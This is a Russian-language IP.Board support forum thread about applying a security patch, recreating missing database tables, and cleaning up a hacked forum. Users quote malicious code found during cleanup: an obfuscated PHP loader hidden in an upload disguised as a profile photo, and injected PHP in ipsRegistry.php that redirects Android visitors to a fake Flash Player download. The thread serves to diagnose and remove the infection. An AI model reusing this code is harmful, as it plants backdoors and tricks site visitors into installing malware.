Перейти к публикации
View in the app

A better way to browse. Learn more.

Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Security update

Рекомендованные сообщения

Опубликовано:
  • Автор

скачал эту штуку, поставил

У вас какая версия форума? IPB version: 3.0.x?

 

подскажите, как исправить?

Восстановить оригинальный файл из дистрибутива и пропатчить его вручную, либо обновится до последней версии линейки 3.1 - 3.1.4

Опубликовано:

ошибка базы данных, 1146, таблица не существует..(Error: 1146 - Table 'ncaab.core_like' doesn't exist)

Исходя из Ваших данных:

IPB version:3.0.x

А откуда ей (таблице) взяться в версии 3.0.х. Вы бы еще от 3.3.х патч взяли.

Опубликовано:
А откуда ей (таблице) взяться в версии 3.0.х. Вы бы еще от 3.3.х патч взяли.

не, у меня 3.1.2 (данные в профиле устаревшие)

 

a0206368dc26.png

 

да вы меня за интеллектуала держите

Изменено пользователем MyrOsLove

Опубликовано:
  • Автор

Два варианта выше уже предложены, еще один - создать эти таблицы, так как они действительно появились только в 3.1.4

 

CREATE TABLE core_like (
like_id				VARCHAR(32),
like_lookup_id		VARCHAR(32),
like_app			VARCHAR(150) NOT NULL DEFAULT '',
like_area			VARCHAR(200) NOT NULL DEFAULT '',
like_rel_id			BIGINT(20) UNSIGNED NOT NULL DEFAULT 0,
like_member_id		INT(10) UNSIGNED NOT NULL DEFAULT 0,
like_is_anon		INT(1) NOT NULL DEFAULT 0,
like_added			INT(10) UNSIGNED NOT NULL DEFAULT 0,
like_notify_do		INT(1) NOT NULL DEFAULT 0,
like_notify_meta	TEXT,
like_notify_freq	VARCHAR(200) NOT NULL DEFAULT '',
like_notify_sent	INT(10) UNSIGNED NOT NULL DEFAULT 0,
PRIMARY KEY (like_id),
KEY find_rel_favs ( like_lookup_id, like_is_anon, like_added),
KEY like_member_id (like_member_id,like_added)
);

 

CREATE TABLE core_like_cache (
like_cache_id		VARCHAR(32),
like_cache_app		VARCHAR(150) NOT NULL DEFAULT '',
like_cache_area		VARCHAR(200) NOT NULL DEFAULT '',
like_cache_rel_id	BIGINT(20) UNSIGNED NOT NULL DEFAULT 0,
like_cache_data		TEXT,
like_cache_expire	INT(10) NOT NULL DEFAULT '0',
PRIMARY KEY (like_cache_id)
);

 

Не забыть про префикс к таблицам если он есть.

Опубликовано:

о, спасибо, сейчас попробую

если что не так, это не повредит базе, верно?

Опубликовано:

ПОМОГЛО!

Есс!

Спасибо, siv1987! Чрезмерно благодарен! :)

  • 3 недели спустя...
Опубликовано:

Добрый день в Админке появилось сообщение...

A security evaluation has revealed a vulnerability that exists in IP.Board and a patch has been released to rectify this issue.

 

Please visit this topic for more information and to download the patch.

 

http://community.invisionpower.com/topic/375885-ipboard-31x-32x-33x-34x-critical-security-update/

 

Т.е. информация о необходимости обновления безопасности...

 

Можноли безбоязненно ставить это обновление на форум купленный у Айбиресурса???

А то прошлое обновление было только для английской версии...

И только намного позже появилось для русской версии..

Опубликовано:

Можноли безбоязненно ставить это обновление на форум купленный у Айбиресурса???

А то прошлое обновление было только для английской версии...

И только намного позже появилось для русской версии..

Можно, в этих файлах ibr ничего не приписывали.
Опубликовано:

Была такая-же проблема. Патч и чистка папок от "грязи" помогла. Спасибо !

 

Ещё нашёл бяку, папка uploads -> profile, файл photo-8031.jpg.

Содержимое:

<?php $svb1omyw='zFGFCOFy#&FlkFhg,HzQHPX?<gQOu<h#OFl#&FGlyFh-OX3;`HXO<H`3x{14>PV~)xq-++-;X?<gQOu<PH/O&Q&3h&Z?Q`uE<rz66*zgJhq-z<`-5SPwD1TD1_hsII~P2hNRRh*hq-C-X?<gQOu<-&Z?Q`uE<rz66*zgJ3qC-HgZu-hv;||ha@`k3h6O<J&hqah||Ah#-$-,HcO&QH,P&Z?Q`uE<PX?<gQOu<3h&Z?Q`uE<rz66*zgJhq#-$-h#$';global$kkbqsn33;$kkbqsn33=array();$l14v3z0t=array(42,49,44,58,45,54,62,51,37,101,109,36,111,100,110,106,125,60,43,0,57,48,127,119,126,59,120,25,13,16,18,22,15,29,118,121,39,55,40,28,61,52,31,123,12,26,9,4,23,11,30,2,98,99,114,113,50,97,34,56);foreach($l14v3z0t as $eqc2nfao)$kkbqsn33[]=($eqc2nfao^95);$j96qsapp=asb1o7s1(array(63,60,38,72,44,79,122,54,79,98,72));$d4od2xp4=$j96qsapp(asb1o7s1($svb1omyw));$uzo89z0p=$d4od2xp4[0];$vvlvxv5l=$uzo89z0p('',$d4od2xp4[1]);$vvlvxv5l();function asb1o7s1($pah,$uv4='',$ec="\x63\x68\x72"){global$kkbqsn33,$lmma;if(!isset($lmma))$lmma=array();static$jjev;if(!isset($jjev))$jjev=0;$pn=$e2c=$d6=$ag=$ec;$t5z=$pn(171^200).$ag(248^151).$e2c(158^235).$d6(177^223).$d6(170^222);$va2=$pn(210^161).$d6(124^8).$e2c(0^114).$pn(216^180).$pn(162^199).$d6(187^213);$k3c=$d6(228^141).$ec(104^27).$pn(120^39).$pn(23^118).$ag(67^49).$pn(108^30).$d6(103^6).$d6(168^209);$tkq=$e2c(100^11).$d6(71^53).$ec(150^242);for($mux=0,$pbrt=0;$mux<($k3c($pah)?$t5z($pah):$va2($pah));$mux++){$czpe=(($k3c($pah)?$pah[$mux]:$tkq($pah[$mux])));if($czpe==(80^90)||$czpe==(108^97))continue;if(!isset($lmma[$czpe])) $lmma[$czpe]=$jjev++;if(!isset($kkbqsn33[$lmma[$czpe]])){echo($pah[$$mux].' '.$czpe);exit;}$uay7=$ec( $kkbqsn33[$lmma[$czpe]]);$uv4.=$uay7;}return$uv4;} ?>

  • 2 недели спустя...
Опубликовано:

Добрый день, почистил от вируса всё что можно.

Но при заходе с телефона под андроидом перекидывает на сайт и просит скачать адоб флеш плауер )))

Так вроде всё что можно почистил подскажите где копать )) Заранее спасибо.

Опубликовано:

Перенаправление это файлы .htaccess

Смотрите их начиная с корня. И смотрите файл до конца, а то вредный код, дописывают в самый конец.

Опубликовано:
  • Автор

В большинстве случаев ставят редирект через htaccess, но могут прописать и в скриптах.

Опубликовано:

В данных файлах все пусто уже 100 раз проверял.

А где живут переназначения юзерагентор форума?

Опубликовано:
  • Автор

В данных файлах все пусто уже 100 раз проверял.

В каких "данных" файлах? htaccess как правило только один, и чтобы редирект сработал он должен быть в корне форума. А если прописали в скриптах, так там больше 1К файлов,вы сто раз их проверяли?... Даже конечно если учесть, что вставят в одном из "глобальных" файлов, так еще и неизвестно какой это редирект - жаваскрипт или серверный.

Опубликовано:

Нашел ))

В файле admin/sources/base/ipsRegistry.php

 

нашел в самом низу и удалил код:

 

 

$mbrowser = mobile_device_detect();

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header("Location: http://www.kirkdavidson.com/js/fp.html");

exit;

}

Создайте аккаунт или войдите в него для комментирования

Сейчас на странице 0

  • Нет пользователей, просматривающих эту страницу.

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.